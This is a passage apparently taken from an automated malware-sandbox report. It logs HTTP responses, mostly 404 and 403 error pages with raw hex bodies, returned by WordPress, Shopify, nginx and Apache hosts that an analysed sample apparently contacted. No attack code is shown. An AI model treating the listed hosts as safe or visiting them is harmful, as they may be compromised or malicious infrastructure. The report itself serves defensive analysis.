0e 02 72 1e fa 44 e3 2f 2a 0a e3 90 85 38 d2 a8 8f 23 32 30 39 db bb 9a 86 9e 4c 43 8a 68 c8 08 0a 29 4a 52 16 ce c2 6f 49 80 16 21 9b 22 36 25 e8 37 09 a6 0c 3d 7e f8 19 4a a3 f9 24 8c d1 b9 65 e8 26 d2 d0 94 b1 94 f6 5a ad 4b 00 d0 fd 64 d6 5a 24 59 90 66 84 d2 96 00 a5 2d 4a 92 16 d2 34 e0 c5 42 16 91 e1 e7 78 42 50 9c 30 34 4e e6 71 80 34 f4 e3 ff fa bf 3f fd e3 0f e8 c7 ff f9 a7 1f ff f8 07 f4 f2 6f 7f ff d3 7f fd dd 4f 7f ff a7 d3 96 80 cf 75 93 66 49 4a 32 76 39 50 92 49 2f 4a a0 0c a5 f2 9e 25 cf 3f fe 42 01 c5 d4 81 73 4a 25 e8 43 65 d8 4a 10 b4 f5 1c 94 5f 22 ba 9b 06 f5 b3 30 65 88 5d a6 64 a0 e0 34 8d 42 1f b3 30 89 5b 51 f0 f6 0b 9a c4 0a f2 23 4c e9 40 e1 ca d4 a8 3f 25 33 ac 4d 32 9c 4e 95 e1 95 f2 2b ce e6 82 29 3d 25 d7 ba 00 d1 93 6c a2 a8 ca af 04 64 ef e9 95 f2 2b e0 a1 f4 94 af c8 e8 71 c8 08 64 86 41 09 2f c2 c1 e5 28 8c a2 34 c2 31 11 d5 76 6f 41 46 54 c0 ce b3 68 37 ac a2 2a bc e0 bd ad 05 56 95 80 88 e2 86 49 0c 70 7f f9 1f e8 af 7f f8 fd 4f ff e5 fb bf fe e1 87 5c d5 2f ff f8 b7 39 e6 4f ff f8 87 97 ff fc a7 97 ff ed 2f e8 a7 3f fe bf 9f fe fe f7 3f fd cd 7f 46 3f fd c3 df bc fc 8f df a3 97 7f fe fe e5 3f fd f0 e3 bf fc 59 51 95 34 01 3d 87 38 7a d7 17 84 4b 65 7d 4c 70 e6 4f 65 86 aa 30 9c 4d 08 53 7a 2b 80 87 31 cb 2e 3f 4f c2 98 89 32 3e 21 b3 34 c2 8c ec 2e eb 3b 74 70 45 39 e9 e7 8c 64 b3 e7 94 65 61 3c 59 2a 4b 55 f9 66 4e b2 4b 2d 8c d3 39 d4 49 46 be 99 87 19 09 44 83 dc 44 51 96 cf 54 25 8c 1f e1 78 32 c7 13 e0 2a 1c c3 f2 d9 f2 b4 25 74 95 b7 Data Ascii: 238f}F+BJiLVn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,x2P/H#89?%l|1IFOlp'a(J'5<*!(!YIEYrD/*8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:07:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-UA-Compatible: IE=edgeLink: <https://ladybillplanet.com/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 79b6a4480cb86945-FRAContent-Encoding: gzipData Raw: 32 33 38 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d db 8e dc 46 96 e0 b3 ea 2b 42 14 4a 95 69 93 4c de f3 56 99 6e 5b 96 dd 5e cb 97 b5 e4 35 ba 65 41 88 24 23 33 a9 62 92 34 23 b2 b2 ca e5 04 fa a1 1f 06 8b 05 e6 61 dc c0 62 d7 33 98 79 58 60 5f 16 e8 dd e9 dd e9 87 de fd 20 cb fd 0f 8b 13 11 64 92 99 cc 4b 55 49 c6 60 ac 12 54 45 46 9c 5b 9c 38 71 e2 c4 95 a7 77 df ff ec c1 93 df 7c fe 10 4d d9 2c 1a 1e 9d c2 1f 14 e1 78 32 50 ce 12 ed e3 2f 14 48 23 38 18 1e dd 39 9d 11 86 91 3f c5 19 25 6c a0 7c f9 e4 03 ad a3 14 e9 31 9e 91 c1 49 96 8c 12 46 4f 90 9f c4 8c c4 6c 70 12 27 61 1c 90 0b 15 8d 93 28 4a 16 27 a8 35 3c 2a 21 28 e7 21 59 a4 49 c6 94 02 45 59 84 01 9b 0e 02 72 1e fa 44 e3 2f 2a 0a e3 90 85 38 d2 a8 8f 23 32 30 39 db bb 9a 86 9e 4c 43 8a 68 c8 08 0a 29 4a 52 16 ce c2 6f 49 80 16 21 9b 22 36 25 e8 37 09 a6 0c 3d 7e f8 19 4a a3 f9 24 8c d1 b9 65 e8 26 d2 d0 94 b1 94 f6 5a ad 4b 00 d0 fd 64 d6 5a 24 59 90 66 84 d2 96 00 a5 2d 4a 92 16 d2 34 e0 c5 42 16 91 e1 e7 78 42 50 9c 30 34 4e e6 71 80 34 f4 e3 ff fa bf 3f fd e3 0f e8 c7 ff f9 a7 1f ff f8 07 f4 f2 6f 7f ff d3 7f fd dd 4f 7f ff a7 d3 96 80 cf 75 93 66 49 4a 32 76 39 50 92 49 2f 4a a0 0c a5 f2 9e 25 cf 3f fe 42 01 c5 d4 81 73 4a 25 e8 43 65 d8 4a 10 b4 f5 1c 94 5f 22 ba 9b 06 f5 b3 30 65 88 5d a6 64 a0 e0 34 8d 42 1f b3 30 89 5b 51 f0 f6 0b 9a c4 0a f2 23 4c e9 40 e1 ca d4 a8 3f 25 33 ac 4d 32 9c 4e 95 e1 95 f2 2b ce e6 82 29 3d 25 d7 ba 00 d1 93 6c a2 a8 ca af 04 64 ef e9 95 f2 2b e0 a1 f4 94 af c8 e8 71 c8 08 64 86 41 09 2f c2 c1 e5 28 8c a2 34 c2 31 11 d5 76 6f 41 46 54 c0 ce b3 68 37 ac a2 2a bc e0 bd ad 05 56 95 80 88 e2 86 49 0c 70 7f f9 1f e8 af 7f f8 fd 4f ff e5 fb bf fe e1 87 5c d5 2f ff f8 b7 39 e6 4f ff f8 87 97 ff fc a7 97 ff ed 2f e8 a7 3f fe bf 9f fe fe f7 3f fd cd 7f 46 3f fd c3 df bc fc 8f df a3 97 7f fe fe e5 3f fd f0 e3 bf fc 59 51 95 34 01 3d 87 38 7a d7 17 84 4b 65 7d 4c 70 e6 4f 65 86 aa 30 9c 4d 08 53 7a 2b 80 87 31 cb 2e 3f 4f c2 98 89 32 3e 21 b3 34 c2 8c ec 2e eb 3b 74 70 45 39 e9 e7 8c 64 b3 e7 94 65 61 3c 59 2a 4b 55 f9 66 4e b2 4b 2d 8c d3 39 d4 49 46 be 99 87 19 09 44 83 dc 44 51 96 cf 54 25 8c 1f e1 78 32 c7 13 e0 2a 1c c3 f2 d9 f2 b4 25 74 95 b7 Data Ascii: 238f}F+BJiLVn[^5eA$#3b4#ab3yX`_ dKUI`TEF[8qw|M,x2P/H#89?%l|1IFOlp'a(J'5<*!(!YIEYrD/*8
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Sat, 18 Feb 2023 12:07:27 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Sat, 18 Feb 2023 12:07:30 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 18 Feb 2023 12:07:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 28 68 84 26 95 e6 95 94 6a 22 ab d5 07 d9 06 32 5d 1f ea 52 00 98 e9 56 70 b2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8d(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU(h&j"2]RVp0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 18 Feb 2023 12:07:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 19 9a e8 19 28 68 84 26 95 e6 95 94 6a 22 ab d5 07 d9 06 32 5d 1f ea 52 00 98 e9 56 70 b2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 8d(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU(h&j"2]RVp0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 18 Feb 2023 12:07:43 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://assilajamiart.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Sat, 18 Feb 2023 12:07:48 GMTserver: LiteSpeedData Raw: 33 61 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 93 e3 b6 b1 e0 cf d9 aa fb 1f 60 4d 79 77 64 93 1c 92 fa 1c 8e 67 13 c7 b1 ab ae 2a b9 bc 7a 4e ea ee 9d bd b7 05 91 90 44 2f 45 2a 24 35 1f 99 e8 7f bf ea 06 40 82 24 28 52 1f b3 49 5e d9 ae 38 23 10 e8 6e 34 80 46 a3 bb d1 f8 e6 8b 3f fc f9 bb bf fc d7 7f 7c 4f d6 f9 26 7a ff 3f de 7c 03 ff 4f 22 1a af ee 07 2c 36 ff fa e3 00 0b 19 0d e0 ff 37 2c a7 c4 5f d3 34 63 f9 fd e0 af 7f f9 c1 9c e3 77 2c 8f e9 86 dd 0f 1e 42 f6 b8 4d d2 7c 40 fc 24 ce 59 9c df 0f 1e c3 20 5f df 07 ec 21 f4 99 89 3f 0c 12 c6 61 1e d2 c8 cc 7c 1a b1 7b 07 a1 44 61 fc 89 a4 2c ba 1f 6c d3 64 19 46 6c 40 d6 29 5b de 0f d6 79 be cd bc 9b 9b d5 66 bb b2 92 74 75 f3 b4 8c 6f 1c 6c 24 89 42 e4 ef d2 64 91 e4 d9 bb 02 f5 bb 38 09 e3 80 3d 19 64 99 44 51 f2 f8 8e dc bc 7f f3 e6 37 df 7c 61 9a e4 2f eb 30 23 59 98 33 12 66 24 d9 e6 e1 26 fc 3b 0b c8 63 98 af 49 be 66 e4 bf 12 9a e5 e4 c7 ef ff 4c b6 d1 6e 15 c6 e4 c1 b9 b5 9c 11 31 89 24 e7 19 6a 58 7e b2 b9 79 4c d2 60 9b b2 2c bb e1 75 b3 9b 8c 25 37 c4 34 df bf f9 cd 37 79 98 47 ec fd 7f d0 15 23 71 92 93 65 b2 8b 03 62 92 6f b3 2c 8c c8 b7 bf d0 4d 48 be 4d f3 6f 6e 78 bd 37 bf e1 5c de a6 c9 96 a5 f9 f3 fd 20 59 79 51 02 6c 52 58 ca e2 8f 7f fd 71 00 bd d1 55 47 48 4a ed 2e dc ad 80 80 3d 1f 81 b5 0a b0 1a dd a2 6d e6 a7 e1 36 27 f9 f3 96 dd 0f e8 76 1b 85 3e cd c3 24 be 89 82 af 7f c9 92 78 40 fc 88 66 d9 fd 00 99 66 66 fe 9a 6d a8 b9 4a e9 76 3d 78 ff 32 f8 1d 4e 96 a7 7c e0 15 83 cd ab c0 70 0f 8c c1 ef 78 4d ef a7 97 c1 ef 00 c7 c0 1b fc 6f b6 f8 31 cc 19 7c 0c 03 a5 1d 05 be 52 60 2b 4d f9 e8 5c 3d b2 05 f4 64 60 0c 76 69 74 b0 ea c0 18 60 77 bd 41 bd 9b c6 20 60 bc 93 61 12 0f bc c1 c0 18 6c 77 8b 28 cc d6 2c 1d 78 2f dd 44 24 e9 8a c6 e1 df 91 2b 83 bd 31 d8 26 b0 3a 42 1a 7d eb 03 a3 06 6a df 7e 64 34 f5 d7 e2 83 31 c8 69 ba 62 39 62 11 9d ff 3e ce d3 e7 ff 48 c2 38 e7 9d fa 0b db 6c 23 9a 03 5f e4 ec 6c f2 e1 b7 d9 fd 4b 86 90 3f e6 2c dd 7c cc f2 34 8c 57 7b 20 e6 6f 3b 96 3e 9b 61 bc dd c1 10 a4 ec 6f bb 30 65 01 c1 55 d5 6c 32 d8 7f 30 06 61 fc 47 1a af 76 74 05 48 b9 a8 d8 1b e5 f0 fc 59 ed 6e 8f 31 aa b0 e7 c0 28 f4 18 c1 28 59 25 2a b3 fe e7 86 ae d8 9f 17 bf 30 1f b8 a5 a1 bb 07 79 37 7c 3a de 00 ec 9b 10 00 de f4 98 4e 8f 5b 53 48 c1 9b dd 36 4a 68 90 dd b8 b6 eb de 38 ee 8d 9f 26 db 2d 0b cc 91 b5 8d 61 86 8b 7a 7f ed 98 a0 47 40 44 49 3b f0 26 b6 6d 0c d6 2c 5c ad f3 81 e7 4c a7 c6 c0 a7 5b 3e e3 1a 93 7c 6f 0c b0 6f bd 26 b4 8e 25 fb fd 87 fd 37 37 7c 9d 80 6c 02 41 7b d3 10 a5 16 4a c6 37 6f be 29 24 fe bb 20 ce cc 6d ca 96 2c f7 d7 ef b8 d8 7f 77 73 d3 98 c
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://assilajamiart.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encoding,User-Agentdate: Sat, 18 Feb 2023 12:07:51 GMTserver: LiteSpeedData Raw: 33 61 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 93 e3 b6 b1 e0 cf d9 aa fb 1f 60 4d 79 77 64 93 1c 92 fa 1c 8e 67 13 c7 b1 ab ae 2a b9 bc 7a 4e ea ee 9d bd b7 05 91 90 44 2f 45 2a 24 35 1f 99 e8 7f bf ea 06 40 82 24 28 52 1f b3 49 5e d9 ae 38 23 10 e8 6e 34 80 46 a3 bb d1 f8 e6 8b 3f fc f9 bb bf fc d7 7f 7c 4f d6 f9 26 7a ff 3f de 7c 03 ff 4f 22 1a af ee 07 2c 36 ff fa e3 00 0b 19 0d e0 ff 37 2c a7 c4 5f d3 34 63 f9 fd e0 af 7f f9 c1 9c e3 77 2c 8f e9 86 dd 0f 1e 42 f6 b8 4d d2 7c 40 fc 24 ce 59 9c df 0f 1e c3 20 5f df 07 ec 21 f4 99 89 3f 0c 12 c6 61 1e d2 c8 cc 7c 1a b1 7b 07 a1 44 61 fc 89 a4 2c ba 1f 6c d3 64 19 46 6c 40 d6 29 5b de 0f d6 79 be cd bc 9b 9b d5 66 bb b2 92 74 75 f3 b4 8c 6f 1c 6c 24 89 42 e4 ef d2 64 91 e4 d9 bb 02 f5 bb 38 09 e3 80 3d 19 64 99 44 51 f2 f8 8e dc bc 7f f3 e6 37 df 7c 61 9a e4 2f eb 30 23 59 98 33 12 66 24 d9 e6 e1 26 fc 3b 0b c8 63 98 af 49 be 66 e4 bf 12 9a e5 e4 c7 ef ff 4c b6 d1 6e 15 c6 e4 c1 b9 b5 9c 11 31 89 24 e7 19 6a 58 7e b2 b9 79 4c d2 60 9b b2 2c bb e1 75 b3 9b 8c 25 37 c4 34 df bf f9 cd 37 79 98 47 ec fd 7f d0 15 23 71 92 93 65 b2 8b 03 62 92 6f b3 2c 8c c8 b7 bf d0 4d 48 be 4d f3 6f 6e 78 bd 37 bf e1 5c de a6 c9 96 a5 f9 f3 fd 20 59 79 51 02 6c 52 58 ca e2 8f 7f fd 71 00 bd d1 55 47 48 4a ed 2e dc ad 80 80 3d 1f 81 b5 0a b0 1a dd a2 6d e6 a7 e1 36 27 f9 f3 96 dd 0f e8 76 1b 85 3e cd c3 24 be 89 82 af 7f c9 92 78 40 fc 88 66 d9 fd 00 99 66 66 fe 9a 6d a8 b9 4a e9 76 3d 78 ff 32 f8 1d 4e 96 a7 7c e0 15 83 cd ab c0 70 0f 8c c1 ef 78 4d ef a7 97 c1 ef 00 c7 c0 1b fc 6f b6 f8 31 cc 19 7c 0c 03 a5 1d 05 be 52 60 2b 4d f9 e8 5c 3d b2 05 f4 64 60 0c 76 69 74 b0 ea c0 18 60 77 bd 41 bd 9b c6 20 60 bc 93 61 12 0f bc c1 c0 18 6c 77 8b 28 cc d6 2c 1d 78 2f dd 44 24 e9 8a c6 e1 df 91 2b 83 bd 31 d8 26 b0 3a 42 1a 7d eb 03 a3 06 6a df 7e 64 34 f5 d7 e2 83 31 c8 69 ba 62 39 62 11 9d ff 3e ce d3 e7 ff 48 c2 38 e7 9d fa 0b db 6c 23 9a 03 5f e4 ec 6c f2 e1 b7 d9 fd 4b 86 90 3f e6 2c dd 7c cc f2 34 8c 57 7b 20 e6 6f 3b 96 3e 9b 61 bc dd c1 10 a4 ec 6f bb 30 65 01 c1 55 d5 6c 32 d8 7f 30 06 61 fc 47 1a af 76 74 05 48 b9 a8 d8 1b e5 f0 fc 59 ed 6e 8f 31 aa b0 e7 c0 28 f4 18 c1 28 59 25 2a b3 fe e7 86 ae d8 9f 17 bf 30 1f b8 a5 a1 bb 07 79 37 7c 3a de 00 ec 9b 10 00 de f4 98 4e 8f 5b 53 48 c1 9b dd 36 4a 68 90 dd b8 b6 eb de 38 ee 8d 9f 26 db 2d 0b cc 91 b5 8d 61 86 8b 7a 7f ed 98 a0 47 40 44 49 3b f0 26 b6 6d 0c d6 2c 5c ad f3 81 e7 4c a7 c6 c0 a7 5b 3e e3 1a 93 7c 6f 0c b0 6f bd 26 b4 8e 25 fb fd 87 fd 37 37 7c 9d 80 6c 02 41 7b d3 10 a5 16 4a c6 37 6f be 29 24 fe bb 20 ce cc 6d ca 96 2c f7 d7 ef b8 d8 7f 77 73 d3 98 c
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:08:06 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:08:08 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:08:11 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:08:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2814e515-6f65-4621-9478-e961c02b1926X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2814e515-6f65-4621-9478-e961c02b1926X-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1Content-Encoding: gzipX-Request-ID: 2814e515-6f65-4621-9478-e961c02b1926CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4zkLhpEYLddlpYshogExnBaIh7hOqT%2BLEYpkl1quYMf9UXlcyEUIBIA9XzEO0SK3zc2jZfOUCIUCfChCLyb0WpkEOLydtbHQYutH7VU8fOE2l%2BkQiPM%2Fv0Etq0xUCEQMbA%3D%3D"}],"group":"cf-nel","max_age":604800}NELData Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 18 Feb 2023 12:08:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Sorting-Hat-PodId: -1Vary: Accept-EncodingVary: AcceptX-Frame-Options: DENYX-Shopify-Stage: productionContent-Security-Policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=98edf26c-9e33-42fa-be87-0ecb38b917b3X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=98edf26c-9e33-42fa-be87-0ecb38b917b3X-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1Content-Encoding: gzipX-Request-ID: 98edf26c-9e33-42fa-be87-0ecb38b917b3CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Np7B%2F8pr2yQVAKFJ%2FAA%2FiWHbjcmg5VD92wdHabrhOHQKLDvkFrAphAjOKuZN%2FUNwvCjRgvtqeQBVpccEiBCBFYyBz0sBNi7yMEd%2BkxXY96Q0iAK%2Btsw5AJSRQnEdJKoIQ%3D%3D"}],"group":"cf-nel","max_age":604800Data Raw: Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 18 Feb 2023 12:08:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: -1X-Dc: gcp-europe-west3X-Request-ID: 2ba198b6-bacf-4025-8030-069259cd3262X-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FFaUaCVVl1ME8whv3ahSS9Z2%2FZthmAIBWsb9HukJ9%2BO5vr1fImMhHJvwitoHt6iNRyN6uAHzJx%2FyNyaxX08X%2BvMp6ud0bPTs3a6c7yxQN%2FdlHCEhjPCufIwRlmEsebvh3Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=20.999908Server: cloudflareCF-RAY: 79b6a5d0fc462c41-FRAalt-svc: 